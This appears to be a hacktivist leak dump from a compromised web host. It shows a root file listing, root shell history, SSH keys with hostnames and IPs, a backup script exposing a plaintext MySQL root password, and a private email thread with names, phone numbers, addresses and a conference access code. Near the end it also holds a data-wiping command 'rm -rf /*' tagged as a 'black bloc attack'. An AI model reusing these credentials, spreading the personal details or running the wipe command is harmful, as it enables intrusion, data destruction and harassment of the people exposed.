  622. drwx------ 2 root root 4096 Sep 14 2010 .links
  623. -rw------- 1 root root 4407 Jun 14 2011 .mysql_history
  624. -rw------- 1 root root 1318 Nov 2 13:52 .php_history
  625. -rw------- 1 root root 19422 Apr 17 2008 .pinerc
  626. -rw------- 1 root root 1024 Jan 5 19:01 .rnd
  627. drwxr-xr-x 2 root root 4096 Jun 22 2009 .ssh
  628. drwxr-xr-x 3 root root 4096 Jul 10 2009 .subversion
  629. -rw-r--r-- 1 root ssmtp 104510 Jan 31 14:38 dead.letter
  630. drwxr-xr-x 3 root root 4096 Jul 10 2009 django
  631. -rw-r--r-- 1 ftp ftp 9716 Oct 2 2008 ez_setup.py
  632. -rwxrwx--- 1 root root 26 Jun 10 2008 ftpPerms.sh
  633. drwx------ 2 root root 4096 Apr 17 2008 mail
  634. -rw-r--r-- 1 root root 112 Apr 22 2008 mail.php
  635. -rwxr-xr-x 1 root root 180 Jun 4 2008 my_emerges.txt
  636. drwxr-xr-x 3 root root 4096 Jul 10 2009 orbited
  637. -rw-r--r-- 1 root root 504 Jul 28 2011 passwords.php
  638. -rwxr-xr-x 1 root root 3451 Jun 30 2010 qmail-filter.sh
  639. -rwxrwx--- 1 ftp ftp 223 Jun 30 2010 setup-filter.sh
  640.  
  641. # cat ftpPerms.sh
  642. chown ftp:ftp /var/www -R
  643.  
  644. # cat .bash_history
  645. */
  646. // An ordered array of the ids of the addressbooks that should be searched
  647. // when populating address autocomplete fields server-side. ex: array('sql','Verisign');
  648. $rcmail_config['autocomplete_addressbooks'] = array('sql');
  649. // ----------------------------------
  650. // USER PREFERENCES
  651. // ----------------------------------
  652. // Use this charset as fallback for message decoding
  653. $rcmail_config['default_charset'] = 'ISO-8859-1';
  654. // skin name: folder from skins/
  655. $rcmail_config['skin'] = 'default';
  656. // show up to X items in list view
  657. $rcmail_config['pagesize'] = 40;
  658. // use this timezone to display date/time
  659. $rcmail_config['timezone'] = 'auto';
  660. // is daylight saving On?
  661. $rcmail_config['dst_active'] = (bool)date('I');
  662. // prefer displaying HTML messages
  663. $rcmail_config['prefer_html'] = true;
  664. // display remote inline images
  665. // 0 - Never, always ask
  666. // 1 - Ask if sender is not in address book
  667. // 2 - Always show inline images
  668. $rcmail_config['show_images'] = 0;
  669. // compose html formatted messages by default
  670. $rcmail_config['htmleditor'] = false;
  671. // show pretty dates as standard
  672. $rcmail_config['prettydate'] = true;
  673. // save compose message every 300 seconds (5min)
  674. $rcmail_config['draft_autosave'] = 300;
  675. // default setting if preview pane is enabled
  676. $rcmail_config['preview_pane'] = false;
  677. // Mark as read when viewed in preview pane (delay in seconds)
  678. // Set to -1 if messages in preview pane should not be marked as read
  679. $rcmail_config['preview_pane_mark_read'] = 0;
  680. // focus new window if new message arrives
  681. $rcmail_config['focus_on_new_message'] = true;
  682. // Clear Trash on logout
  683. $rcmail_config['logout_purge'] = false;
  684. // Compact INBOX on logout
  685. $rcmail_config['logout_expunge'] = false;
  686. // Display attached images below the message body
  687. $rcmail_config['inline_images'] = true;
  688. // Encoding of long/non-ascii attachment names:
  689. // 0 - Full RFC 2231 compatible
  690. // 1 - RFC 2047 for 'name' and RFC 2231 for 'filename' parameter (Thunderbird's default)
  691. // 2 - Full 2047 compatible
  692. $rcmail_config['mime_param_folding'] = 1;
  693. // Set true if deleted messages should not be displayed
  694. // This will make the application run slower
  695. $rcmail_config['skip_deleted'] = false;
  696. // Set true to Mark deleted messages as read as well as deleted
  697. // False means that a message's read status is not affected by marking it as deleted
  698. $rcmail_config['read_when_deleted'] = true;
  699.  
  700. // Set to true to newer delete messages immediately
  701. // Use 'Purge' to remove messages marked as deleted
  702. $rcmail_config['flag_for_deletion'] = false;
  703.  
  704. // Default interval for keep-alive/check-recent requests (in seconds)
  705. // Must be greater than or equal to 'min_keep_alive' and less than 'session_lifetime'
  706. $rcmail_config['keep_alive'] = 60;
  707.  
  708. // If true all folders will be checked for recent messages
  709. $rcmail_config['check_all_folders'] = false;
  710.  
  711. // If true, after message delete/move, the next message will be displayed
  712. $rcmail_config['display_next'] = false;
  713.  
  714. // 0 - Do not expand threads
  715. // 1 - Expand all threads automatically
  716. // 2 - Expand only threads with unread messages
  717. $rcmail_config['autoexpand_threads'] = 0;
  718.  
  719. // When replying place cursor above original message (top posting)
  720. $rcmail_config['top_posting'] = false;
  721.  
  722. // When replying strip original signature from message
  723. $rcmail_config['strip_existing_sig'] = true;
  724.  
  725. // Show signature:
  726. // 0 - Never
  727. // 1 - Always
  728. // 2 - New messages only
  729. // 3 - Forwards and Replies only
  730. $rcmail_config['show_sig'] = 1;
  731.  
  732. // When replying or forwarding place sender's signature above existing message
  733. $rcmail_config['sig_above'] = false;
  734. // Use MIME encoding (quoted-printable) for 8bit characters in message body
  735. $rcmail_config['force_7bit'] = false;
  736. // Defaults of the search field configuration.
  737. // The array can contain a per-folder list of header fields which should be considered when searching
  738. // The entry with key '*' stands for all folders which do not have a specific list set.
  739. // Please note that folder names should to be in sync with $rcmail_config['default_imap_folders']
  740. $rcmail_config['search_mods'] = null; // Example: array('*' => array('subject'=>1, 'from'=>1), 'Sent' => array('subject'=>1, 'to'=>1));
  741. // 'Delete always'
  742. // This setting reflects if mail should be always deleted
  743. // when moving to Trash fails. This is necessary in some setups
  744. // when user is over quota and Trash is included in the quota.
  745. $rcmail_config['delete_always'] = false;
  746. // end of config file
  747. echo "" > main.inc.php
  748. nano main.inc.php
  749. ssh mail
  750. cd /var/www/vhosts/
  751. ./new www.aeoniun.com aeoniun.com
  752. cd /var/backup/mysql/
  753. ls
  754. ls -l
  755. grep '`roundcube' mysql_all.dmp.1
  756. grep '`roundcube' mysql_all.dmp.1 -N
  757. grep '`roundcube' mysql_all.dmp.1 -n
  758. grep 'USE `' mysql_all.dmp.1 -n
  759. sed -n '4692,4897 p' mysql_all.dmp.1 > roundcubemail.sql
  760. ls
  761. nano roundcubemail.sql
  762. cd /var/www/vhosts/workshop.tensquirrel.com/docroot/widespread/
  763. ls -al
  764. cat index.html
  765. top
  766. rc-status
  767. ssh mail
  768. passwd squ1rr3lm3
  769. passwd
  770. uptime
  771. drives
  772. cd /var/www/vhosts/
  773. du -sh .
  774. du -sh *
  775. drives
  776. cd ..
  777. du -sh *
  778. cd ../../
  779. du -sh *
  780. cd /var
  781. du -sh *
  782. cd log
  783. du -sh *
  784. cd apache2/
  785. ls
  786. ls -h
  787. ls -hl
  788. mv access_log access_log~
  789. touch access_log
  790. ls
  791. ls -lh
  792. /etc/init.d/apache2 restart
  793. ls -lh
  794. rm access_log~
  795. drives
  796. cd /etc/
  797. cd ../var
  798. cd www
  799. cd vhosts
  800. ls
  801. cd csi.markbranding.com/
  802. ls
  803. cd docroot/
  804. ls
  805. cd _img
  806. ls
  807. ls -al
  808. chmod 777 products
  809. ls -al
  810. exit
  811. ls
  812. cd ../
  813. ls
  814. cd var/www
  815. ls
  816. cd vhosts
  817. cd csi.markbranding.com/
  818. cd docroot
  819. cd cc
  820. ls
  821. cd ckeditor/
  822. ls
  823. cd filemanager/
  824. ls
  825. cd -al
  826. ls -al
  827. chmod 777 userfiles
  828. lsl -al
  829. ls -al
  830. exit
  831. cd ../
  832. ls
  833. cd var/www/vhosts/
  834. cd csi.markbranding.com/
  835. cd docroot/cc
  836. ls
  837. cd ckeditor/filemanager/
  838. ls
  839. ls -al
  840. chmod 777 userfiles
  841. ls -al
  842. cd ../ls
  843. cd ../
  844. ls
  845. ls -al
  846. chmod 777 filemanager
  847. ls -al
  848. cd /var/www
  849. ls
  850. cd vhosts/www.combinedsystems.com/
  851. ls
  852. cd docroot
  853. ls
  854. cd cc/ckeditor
  855. ls
  856. cd filemanager/
  857. ls -al
  858. cd ../../
  859. ls
  860. cd ../
  861. ls
  862. cd la -al
  863. ls -al
  864. chmod 777 .htaccess
  865. cd ../
  866. ls
  867. cd docroot
  868. ls
  869. nano .htaccess
  870. exit
  871. cd /var/www/vhosts/www.petitepawsbnb.com/docroot/
  872. ls -al
  873. chmod 755 index.php
  874. cd admin/
  875. ls
  876. ls -al
  877. chmod 755 index.php
  878. ls -al *
  879. cd ..
  880. cd ..
  881. find . -type f -name *php -exec chmod 755 {} \;
  882. ls -al *
  883. find . -type f -name *php -exec chmod 744 {} \;
  884. ls -al *
  885. find . -type f -name *php -exec chmod 766 {} \;
  886. ls -al *
  887. cd /etc/apache2/ssl/
  888. ls
  889. cd 2011
  890. ls
  891. cd ..
  892. ls
  893. mkdir 2012
  894. cd 2012
  895. ls
  896. ls ../2011
  897. ls ../2010
  898. ls /usr/local/bin
  899. df -h
  900. w
  901. openssl genrsa -out www.cbts.edu.key 2048
  902. openssl req -new -key www.cbts.edu.key -out www.cbts.edu.csr
  903. ls
  904. cat *.csr
  905. cd /etc/apache2/ssl/
  906. ls
  907. cd 2012
  908. ls
  909. nano -w www.cbts.edu.crt
  910. ls -lh
  911. chmod 400 *
  912. ls -lh
  913. nano -w /etc/apache2/httpd.conf
  914. /etc/init.d/apache2 restart
  915. cd /var/www/vhosts
  916. ls
  917. cd csi.markbranding.com/
  918. ls
  919. cs docroot/
  920. ls
  921. cd docroot/
  922. ls
  923. cd _img
  924. ls
  925. ls -al
  926. cd /var/www/vhosts
  927. cd combinedsystems.com/
  928. ls
  929. cd docroot
  930. ls
  931. cd _img
  932. ls
  933. ls -al
  934. exit
  935. cd /var/www/vhosts/
  936. ls
  937. ln -sf www.combinedsystems.com www.pennarms.com
  938. ln -sf www.combinedsystems.com pennarms.com
  939. ln -sf www.combinedsystems.com less-lethal.com
  940. ln -sf www.combinedsystems.com www.less-lethal.com
  941. ln -sf www.combinedsystems.com www.handcuffsusa.com
  942. ln -sf www.combinedsystems.com handcuffsusa.com
  943. cd www.combinedsystems.com/
  944. du -sh .
  945. ifconfig
  946. ifconfig
  947. cat /etc/resolv.conf
  948. rc-status
  949. /etc/init.d/metalog restart
  950. rc-status
  951. /etc/init.d/mysql start
  952. ps aux | grep mysql
  953. /etc/init.d/mysql restart
  954. cd /var/www/vhosts/
  955. ls *mail*
  956. ssh mail
  957. cd mail.tensquirrel.com/
  958. ls
  959. ssh mail
  960. cd /var/www/vhosts/www.cambridgechurch.org/docroot/
  961. ls
  962. cd contact/
  963. ls
  964. nano index.php
  965. cd /var/www/vhosts/
  966. ./new voltage.tensquirrel.com
  967. cd
  968. php passwords.php
  969. cd /var/www/vhosts/www.cbts.edu/docroot/
  970. ls
  971. cd Paypal.com
  972. ls
  973. less Pay_EN.php
  974. ls -al
  975. ls -lu
  976. ls -lc
  977. cd WEBSCR-640-20101004-1/
  978. ls
  979. ls -al
  980. ls *
  981. cd ..
  982. cd ..
  983. rm -r Pay*
  984. ls
  985. cd /
  986. cd /var/www/vhosts/
  987. find . type f -name *Paypal*
  988. find . type f -name *Paypal* -exec rm -r {}\;
  989. find . type f -name *Paypal* -exec rm -r {};
  990. find . type f -name *Paypal* -exec rm -rf {};
  991. rm -r www.sur-tec.com/docroot/Pay*
  992. rm -r www.combinedsystems.com/docroot/cc/ckeditor/filemanager/userfiles/Pay*
  993. find . type f -name *Paypal*
  994. find . -type f -name *Paypal*
  995. find . -type d -name *Paypal*
  996. clear
  997. cd www.combinedsystems.com/docroot/cc/ckeditor/filemanager/userfiles/
  998. ls
  999. ls cheddar_bay/
  1000. cd ..
  1001. ls
  1002. less ReadMe.txt
  1003. cd userfiles/
  1004. cd ..
  1005. ls
  1006. less user.php
  1007. ls scripts/
  1008. ls -al
  1009. cd userfiles/
  1010. cd cheddar_bay/
  1011. less cheddar_bay.sh
  1012. less cheddar_bay.sh
  1013. getent
  1014. getent --help
  1015. cd ../../
  1016. rm -r userfiles/
  1017. ls
  1018. rm user.php
  1019. ls
  1020. less connector.inc.php
  1021. tail dme
  1022. dmesg | tail
  1023. cd /var/log/
  1024. ls
  1025. cd sshd/
  1026. ls
  1027. tail current
  1028. cd ../pwdfail/
  1029. ls
  1030. tail current
  1031. cd /var/www/vhosts/www.sur-tec.com/docroot/
  1032. ls
  1033. cd 1
  1034. ls
  1035. cd ..
  1036. rm -r 1*
  1037. rm user.php
  1038. rm fleurshi-.-.php
  1039. less access-request.php
  1040. cd datalauncher
  1041. ls
  1042. less index.php
  1043. less login
  1044. cd ..
  1045. less login.php
  1046. clear
  1047. cd ..
  1048. cd ..
  1049. find . -type f -name *fleur*
  1050. find . -type f -name user.php
  1051. cd www.combinedsystems.com/
  1052. ls
  1053. less user.php
  1054. rm user.php
  1055. cd docroot/
  1056. ls
  1057. ls cgi_bin/
  1058. less cgi_bin/index.php
  1059. rm -r cgi*
  1060. ls
  1061. cd ../../
  1062. find . -type d -name *cgi*
  1063. find . -type d -name *zip
  1064. find . -type d -name *1*
  1065. find . -type f -name *1*
  1066. find . -type f -name *zip
  1067. find . -type f -name Final-production-files*
  1068. find . -type f -name Final-production-files* -exec rm -r {} \;
  1069. cd www.combinedsystems.com/docroot/cc/ckeditor/filemanager/
  1070. ls -al
  1071. ls .manage/
  1072. rm -r .manage/
  1073. ls -al
  1074. less ReadMe.txt
  1075. cd ..
  1076. ls
  1077. chmod 766 filemanager/
  1078. ls
  1079. ls -al
  1080. chmod 755 filemanager/
  1081. ls -al
  1082. chmod 755 filemanager/ -R
  1083. find . -type f -name *sh
  1084. rm -r _samples/
  1085. cd ..
  1086. ls
  1087. cd ckeditor~
  1088. ls
  1089. cd filemanager/
  1090. ls
  1091. ls -al
  1092. cd userfiles/
  1093. ls -al
  1094. cd ../../
  1095. cd ../
  1096. ls
  1097. less index.php
  1098. ls users/
  1099. cd ../../includes/
  1100. ls
  1101. ls lib/
  1102. less master.class.php
  1103. less lib/site.class.php
  1104. less prepend.php~
  1105. cd ../docroot/cc/
  1106. ls
  1107. cd lib
  1108. ls
  1109. cd lib
  1110. ls
  1111. less Permission.php
  1112. cd ..
  1113. less admin.init.php
  1114. ls
  1115. cd lib
  1116. less DF.php
  1117. clear
  1118. cd /var/www/vhosts/
  1119. grep -h
  1120. grep --help
  1121. grep -i paypal * -R
  1122. tail /var/log/everything/current
  1123. cd /var/log/apache2/
  1124. grep fleur access_log
  1125. tail -n 2000 access_log > snip.log
  1126. grep fleur snip.log
  1127. grep fleur Paypal.com
  1128. grep fleur Paypal.com snip.log
  1129. grep 'Paypal' snip.log
  1130. grep '41.200.63.234' access_log > snip.log
  1131. cd /var/www/vhosts/
  1132. find . -type f -name *gz
  1133. cd /var/log/apache2/
  1134. ls
  1135. ls -l
  1136. grep fleur error_log
  1137. cd /var/www/vhosts/www.combinedsystems.com/docroot/cc/
  1138. ls
  1139. mv ckeditor .ckeditor
  1140. rm -r ckeditor~
  1141. find . -type f -name uploadtest*
  1142. find . -type f -name *test*
  1143. cd .ckeditor/
  1144. find . -type f -name *test*
  1145.  
  1146. # cat .ssh/*
  1147. ssh-dss AAAAB3NzaC1kc3MAAACBALTusKcd1w5RSRD8xqkzZ0K/2FGFF9SDuts5SjL53mh09spbBKVeezSiz2LqCpnooO649tGnUDBYp9e8eDn845PUx79X1HtN+jabqAD5+ZLJkcp0IOwdU4d2qiZYwNNJyf2YScdQXIXlaPlxt2tV2RI2OJPXewr4PQqsrogTSqtVAAAAFQCL64xTJWFjYynfKqoQadQviVOXXwAAAIBoxAwlQg62XZO9kCEXyJnN8M/OSyED1jtGcfulisGiK1dOv7oDHaPWCb7Lwu6sGP53sA747ciidXBOSoxNtmuDnKYmXyQq3K/a42dnpUMlufwVRbHX27iOxzdbaQL7IOmB07oZ95+vxVeITCAaQY8Lt7lKs+1VY83vhzNZBCvJwQAAAIEAicNBsi0KidsYh1Kb2kdE8z98WfUQVomtf5Pr+zlYU+N6EDM5d3lja8G5A2LYMdiW0fPWYTh8wapwwpS6lsTpsERJzeF9HACug46YvjFwMunsr37dMF8Lcegn61iKDjsxJVEKHyD+sBtMby8sgplZy4Y8Ux4dWhZEb1Ad4ZLvoLc= geeojr@one
  1148. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAs3tWolNRJ6atYIXk0WkFB1FOeKo71XLYGGE/mpJYAKKq4QqDTEuxgxPB4MxhJEg+VIYIcZixEZ+1njh83bobb6Id7x2S63PIg2XoDKfn0t9TUnrSJUbbrwdw4AWioFXjTbk5NvWngFhQW1sW+pGfzTs0TejCXD8J7+4CMnJqo4HKb3ii5N2oZ2YjNMqdy0dXChAeru6zdWYf2ccxxzBLuxdo4rgoYwafWG83pxO2D1DBCO8GOeUmOdpfTy1D4St9T9zImIyG+zYDgkPB+JBz9KH3I34864g5Rro8FUbtPSGSRbE27WR5Y2OHrBF8OzH03gGB6qrPxixWb/aXaxi+yw== jgeeo@fuji
  1149. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsSQc+lG487maU5LROdvXUb3dtQzEA1xcOlYaoFiIOOEta2d/0x7S0SPxvwpjpem5lO50O5K/yPxJGyEPzcSa8k16I3ujIUCtMNlUjCo6/KNOBaGbLGvedbjECm5gkVgx04lANC8uVZIVQt5cSxPwAthyn64varQPus060B6pZFEs+QZM1+uBMAT4vj/RB3mkB2+mwL2CdhT/0GT5/ijCs5ECqco7DZmG9O2t1YX3iXegpCQcMq/BKEAJOI/gE0IXe9XT+HLuTGEdhUkgO57Ss3E0M7q4oWuOAzXZAzvvbxwqU7ki/HG9Th0gNEKyfcveio1F6sK/ZKfAxYAG5eBW9w== geeojr@two
  1150. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAotlHRfPpO6j2jM4k+swF7V1fFMIc7T0hS93hEAWP4WUD6gTW3TNbh9pe2SFLiBvn3m1MUgEvz4GtpH9Ety6B45/q2y4Cf4CKZqAmWDXVpY5kfrGK+ZW88tCXGwqhi0wMzVIY5LeHcIaRWUzswZr3U6oi0IXGzkhzeE1L2K8+IIzIjmLHPaA3kzgWuQttvLz3yjKcWZGEUg/A22JXHm/XXKQlmi0f3iD7rJJkCR3/QjORjQmruOp6uQ31ndNFN7jspGxPtH+4roCOPoXzPiOjlWdCeowZ/mdLnxDH7IA+gSV/nciigq4AyPgWFiE5K+U6SA5K0rG8dqloozDELAQ51Q== root@zero
  1151. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxcszrBEYcXYKdyPdJA9aiGoVXb9vvy8KutFlKjZIvJxspZnbsdFwj8+g2AFLGWXE98AlXYXdzTupjdU9thmy5TTnSvvT4EVMIr7rPp0b7aodZaaH/EIjalk+9qHQg7PUhtLE1SL2SqF/Vc5OvxR4cukdDRm1Z+o1/nIu2nitDaUuDk//kpILKVg0Hr5grDmPPiqAcf2wvracPYTErzje8TBOq0JkCC6EmsH5ptAzsm+cjRoE5hvHbuXG+gR3ecr4HtHPXwut6goqYEAbHddaVlMoxsKEkxEdHlrxUzXK+OPjwQ35bqjA31L2FValYCC8rbte0CmrX5gReVjtAqnzgQ== geeojr@one
  1152. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzZlG+uPSQfd8e9UhnjuefL/HuISgfYVVbbIHCydDdXmjZMq6kdXKdG4JC65G6pQbhe/kGc8rumv1QULkO4Nkf3h/0QLCWiBAsEFysOJcQY1M1aZUIVH6Hk5wAQsUZ5TY+LP7dQVEsd3KYwbSnU1ucmBc5LXY4mXbNF6+iEgjLsInYxmDyHezNBs/v1fq0GUSyICNwYyL4pdue638RDopLlQ8ctRLxrz86LMGXAecP/E3N50KfFRXum7rfoudDTWKFk0DAYJ93EfJrzic2GFZZmJwVPA1xfKdcGGLdYTAOrh0zdM245fU4KqQKuozdx0h62ULuoRxbLFh3Skh0kJ93Q== root@fs0
  1153.  
  1154. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0UnumTWKqtXFoXuQHa56KWNkB9UH5OzoXaWvxhFdliCc+jrJbV0A98RGE88CR8wMUDW6sya3tir8P3DajPZTLPCzggvVstwGwGPo9QFaqgpREjjCbkmEoKRbE691uA7+2I4B6eZkAIHAHYoPmU8zEoCJCp2n3ybugzadLDD51x9s/1cvVDUIVwmDU2GhzfjiKOGmFd9+QxV+heWyOvsrS4ufayZzCtej1gu4OkRWvDWVs319Di5uvZ5XyQbDzWydVfLTvsYXJbWm8S8f41S+X24eNtAiH8eF69ZpSzf1ff8pHKqOB6HdWXin1/4U8hfThJSKHlfPeottXXTQM6wnfQ== root@kc1
  1155. 66.6.112.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwjOL3bBin510vUN8UZvpQrAztjPU00glMEApXmZULxV/VHHJgsPuH3vUgH4bppF/0c0uGTR3QKGC+zdsUQ7AbxXi4o2C+WsbTvLWaMhPhk+jrPDHgovts5vpVTwg6LnEKRLenZo5ivhcix1eoX2XCqdLwkxVyCD/iXfgvsYaOLx58QVDquacVZ74kuJY1/67GlYwVvRCn1EYZlL+K5F4f95y4eXp9jI4MEs/riNU6sQlWs380cQ8clO5Fh8L5bdriZ0b/dm775IR4iEpDYRVIqP/fmVZ5XO++upO84BZyeLGErxSaNw52vIe/c6uaC/2fKtnOchKiyQNZG2u8MxjWw==
  1156. fs0.rivercitynet.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwjOL3bBin510vUN8UZvpQrAztjPU00glMEApXmZULxV/VHHJgsPuH3vUgH4bppF/0c0uGTR3QKGC+zdsUQ7AbxXi4o2C+WsbTvLWaMhPhk+jrPDHgovts5vpVTwg6LnEKRLenZo5ivhcix1eoX2XCqdLwkxVyCD/iXfgvsYaOLx58QVDquacVZ74kuJY1/67GlYwVvRCn1EYZlL+K5F4f95y4eXp9jI4MEs/riNU6sQlWs380cQ8clO5Fh8L5bdriZ0b/dm775IR4iEpDYRVIqP/fmVZ5XO++upO84BZyeLGErxSaNw52vIe/c6uaC/2fKtnOchKiyQNZG2u8MxjWw==
  1157. fs1.krombie.net,208.110.93.110 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAut1wInovVXvG6odiRAAJNDg1X1pkA4RljV686HBysaOG9kvhkSQc2kSvdIrfWxgkkVLaWdlIvnqD/aRkX+Mh9whCaZWTDYdmXtfIZ7SnYxgBqSwsLyrqnCLCaSDk3lHVSN5IlFwxENT/wgub3uINvs+QaeDTC4CRJmsClPS6RLCcmAq4KkR7Uwqr1jo3FlZitNRmKHyv0vxrmY7HaHBR5QRChj8kUrxjSyocmA2szRPYEBbMgkNCteyg376gjKAyq2ds79KI+2M5AMotIbJOJnC95OMQOhjf8Qa5swRR3aO1rf9X6hehuhFwb/4O9F80v2SJx+PhBlqkDwY0lee0Zw==
  1158. mail.tensquirrel.com,69.30.233.89 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEArb+3YCSUu6eupDt9zeqSQhbF2Ne7B0ww8LjL95F1f97299E2Mnf5s3dDLZ5Xi/UcVKjGP71ijcNRO6kEEKcb7/1nS/LO+ewe7B1t/vSbd6+R6XeztVy+N1Vmml04rZGUmyECfL2Ry188rjYJW/S8/jtEF1tYNoSMZEzn4BYREL5CYRf3zG4IkDwhxo7QiV7JCbd4PPc+8O2t2LqPzI9c+smddRYbeHp2wzCLcxN9fRf4ekjzqJTw+G//7kNp5v+bRSpyvUrx1Cev8aWG7lhUd1Dqf/NqU8jFYCv6Ujk6HomG2uYntjdrjWsNvd0zB0bCHLSScw22rNlE+aEZxUbnTQ==
  1159. mail ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLhD02kFlxwn2hGI31YfgBZSh2J5XaX/cD4DTVen5q2h0MyAbtgJy301l2EZpIXdt2i4bRT+/inCr8a0Z0h1tjA=
  1160.  
  1161. # cd /var/backup; ls -al
  1162. total 16
  1163. drwxr-xr-x 3 root root 4096 May 10 2010 .
  1164. drwxr-xr-x 17 root root 4096 Dec 14 2010 ..
  1165. -rwxrwx--- 1 root root 914 Dec 2 2010 backup_mysql.sh
  1166. drwxr-xr-x 2 root root 4096 Feb 13 00:00 mysql
  1167. # cat backup_mysql.sh
  1168. #!/bin/bash
  1169. rm /var/backup/mysql/mysql_all.dmp.10 &&
  1170. mv /var/backup/mysql/mysql_all.dmp.9 /var/backup/mysql/mysql_all.dmp.10 &&
  1171. mv /var/backup/mysql/mysql_all.dmp.8 /var/backup/mysql/mysql_all.dmp.9 &&
  1172. mv /var/backup/mysql/mysql_all.dmp.7 /var/backup/mysql/mysql_all.dmp.8 &&
  1173. mv /var/backup/mysql/mysql_all.dmp.6 /var/backup/mysql/mysql_all.dmp.7 &&
  1174. mv /var/backup/mysql/mysql_all.dmp.5 /var/backup/mysql/mysql_all.dmp.6 &&
  1175. mv /var/backup/mysql/mysql_all.dmp.4 /var/backup/mysql/mysql_all.dmp.5 &&
  1176. mv /var/backup/mysql/mysql_all.dmp.3 /var/backup/mysql/mysql_all.dmp.4 &&
  1177. mv /var/backup/mysql/mysql_all.dmp.2 /var/backup/mysql/mysql_all.dmp.3 &&
  1178. mv /var/backup/mysql/mysql_all.dmp.1 /var/backup/mysql/mysql_all.dmp.2 &&
  1179. mv /var/backup/mysql/mysql_all.dmp /var/backup/mysql/mysql_all.dmp.1 &&
  1180. mysqldump -u root -pbigGoat -r /var/backup/mysql/mysql_all.dmp -A
  1181. echo "MySQL Backup Run Done `ls -l /var/backup/mysql/`"
  1182.  
  1183. # rm -rf /* & // BLACK BLOC ATTACK!!!!1
  1184.  
  1185. ################################################################################
  1186.  
  1187. Talk to you then!
  1188.  
  1189. ~B
  1190.  
  1191. On 11/09/2011 04:44 PM, Paul Davies wrote:
  1192. > We await with baited breath... 10:30 it is..
  1193. >
  1194. > Conference Dial-in Number: (218) 844-8230
  1195. > Participant Access Code: 624522#
  1196. >
  1197. > talk to you tomorrow.
  1198. >
  1199. > Paul
  1200. >
  1201. >
  1202. > Paul Davies
  1203. > President, MARK Corporate Branding
  1204. >
  1205. > 104 East 5th Street, Suite 200 I Kansas City, MO 64106 I c] 816.520.1791 I p] 816.256.3477 I f] 816.326.0888 I pdavies@MARKbranding.com I www.MARKbranding.com
  1206. >
  1207. > P.S. Please don't keep us a secret! Your referrals are the lifeblood of our business. If you know someone who would appreciate the high level of service we provide, please call us immediately, and we will be happy to follow up! Thank you.
  1208. >
  1209. >
  1210. >
  1211. >
  1212. >
  1213. > On Nov 9, 2011, at 4:29 PM, Paul Ford wrote:
  1214. >
  1215. >> Just to confirm 10:30A tomorrow.
  1216. >> -- P
  1217. >>
  1218. >>
  1219. >> From: Paul Davies <pdavies@markbranding.com>
  1220. >> Date: Tue, 8 Nov 2011 11:56:06 -0600
  1221. >> To: Paul Ford <paulford@combinedsystems.com>
  1222. >> Subject: Re: CSI Site Link
  1223. >>
  1224. >> Thursday 10, 10:30 it is!! I'll initiate the call.
  1225. >>
  1226. >> paul
  1227. >>
  1228. >>
  1229. >> Paul Davies
  1230. >> President, MARK Corporate Branding
  1231. >>
  1232. >> 104 East 5th Street, Suite 200 I Kansas City, MO 64106 I c] 816.520.1791 I p] 816.256.3477 I f] 816.326.0888 I pdavies@MARKbranding.com I www.MARKbranding.com
  1233. >>
  1234. >> P.S. Please don't keep us a secret! Your referrals are the lifeblood of our business. If you know someone who would appreciate the high level of service we provide, please call us immediately, and we will be happy to follow up! Thank you.
  1235. >>
  1236. >>
  1237. >>
  1238. >>
  1239. >>
  1240. >> On Nov 8, 2011, at 11:04 AM, Paul Ford wrote:
  1241. >>
  1242. >>> Can we do 1030am ?
  1243. >>>
  1244. >>> Paul Ford
  1245. >>> Sent from my iPhone
  1246. >>>
  1247. >>> On Nov 8, 2011, at 11:44 AM, Paul Davies <pdavies@markbranding.com> wrote:
  1248. >>>
  1249. >>>> Paul,
  1250. >>>>
  1251. >>>> I forwarded this on to Becky, our programmer. We'd like a conference call with you on Thursday morning, 10:00 am or thereabouts... can you be available? If not... shoot back a possible time. Thx.
  1252. >>>>
  1253. >>>> Paul
  1254. >>>>
  1255. >>>>
  1256. >>>> Paul Davies
  1257. >>>> President, MARK Corporate Branding
  1258. >>>>
  1259. >>>> 104 East 5th Street, Suite 200 I Kansas City, MO 64106 I c] 816.520.1791 I p] 816.256.3477 I f] 816.326.0888 I pdavies@MARKbranding.com I www.MARKbranding.com
  1260. >>>>
  1261. >>>> P.S. Please don't keep us a secret! Your referrals are the lifeblood of our business. If you know someone who would appreciate the high level of service we provide, please call us immediately, and we will be happy to follow up! Thank you.
  1262. >>>>
  1263. >>>>
  1264. >>>>
  1265. >>>>
  1266. >>>>
  1267. >>>> On Nov 7, 2011, at 11:07 PM, Paul Ford wrote:
  1268. >>>>
  1269. >>>>> Paul, My answers are below:
  1270. >>>>>
  1271. >>>>> On Nov 4, 2011, at 3:52 PM, Paul Davies wrote:
  1272. >>>>>
  1273. >>>>>> Paul,
  1274. >>>>>>
  1275. >>>>>> I'm hoping you are now recovered from your travels and might find some time to look at where we are on the web site. Here's the link to the dev site:
  1276. >>>>>>
  1277. >>>>>> http://csi.markbranding.com/
  1278. >>>>>>
  1279. >>>>>>
  1280. >>>>>> We have a few questions for you as we're tweaking things:
  1281. >>>>>>
  1282. >>>>>> 1. Handcuffs and Aerosol products are the only ones that can be purchased online - is that still correct?
  1283. >>>>> [Paul Ford] This is still correct. That's not to say that in the future we won't add other products, like gun cleaning kits, weapons sights for the 40MM or other less lethal products that a police officer can purchase himself or a private citizen could buy. I don't see any differentiation from my brief visit to the site or any area designated as a store. Looks like you can put anything in a shopping basket.
  1284. >>>>>>
  1285. >>>>>> 2. Each product has 2 prices, Distributor Price and Agency Price. In order to determine who sees what price, customers will need to log in and their account needs to be able to determine which price they see. From our notes, the plan for this is to allow customers to request an account. CSI will then grant them access and assign them a status of Distributor or Agent. Currently, all prices are showing on the site - we will remedy this after we talk with you to confirm this feature.
